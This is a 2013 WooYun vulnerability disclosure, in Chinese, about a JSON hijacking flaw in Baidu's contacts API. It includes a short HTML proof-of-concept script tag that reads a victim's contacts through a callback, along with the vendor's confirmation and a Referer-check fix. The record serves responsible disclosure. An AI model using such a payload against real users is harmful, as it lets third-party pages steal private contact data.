当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-020187

漏洞标题:百度通讯录一个漏洞可以劫持他人信息

相关厂商:百度

漏洞作者: 不懂xx

提交时间:2013-03-18 14:40

修复时间:2013-05-02 14:41

公开时间:2013-05-02 14:41

漏洞类型:敏感信息泄露

危害等级:低

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-03-18: 细节已通知厂商并且等待厂商处理中
2013-03-19: 厂商已经确认,细节仅向厂商公开
2013-03-29: 细节向核心白帽子及相关领域专家公开
2013-04-08: 细节向普通白帽子公开
2013-04-18: 细节向实习白帽子公开
2013-05-02: 细节向公众公开

简要描述:

昨天看以前漏洞http://www.wooyun.org/bugs/wooyun-2010-012316有没有修复,又发现了另一个洞。csrf还没有修噢,搞基工程师就是搞基的吗?

详细说明:

其实也很简单。就是json劫持,没什么大不了的。关键是通讯录这么敏感的信息,被搞到了就不好了。特别是在315这样,连cookie都神话的大环境下。
如下攻击样例:

<script>  
function xx(a){
alert(a.total_cnt);
}
</script>
<script src="http://tongxunlu.baidu.com/rest/2.0/pim/contacts?method=iterator&limit=10000&app_id=20&ignore_error=1&callback=xx"></script>


//注意一定要有http哦

漏洞证明:

txl.jpg

修复方案:

修复,判断referer,修复csrf同时也修复了这个。可以参考下乌云那啥文档不错。

版权声明:转载请注明来源 不懂xx@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:2

确认时间:2013-03-19 00:24

厂商回复:

该问题内部已发现正在处理,感谢提交,谢谢!

最新状态:

暂无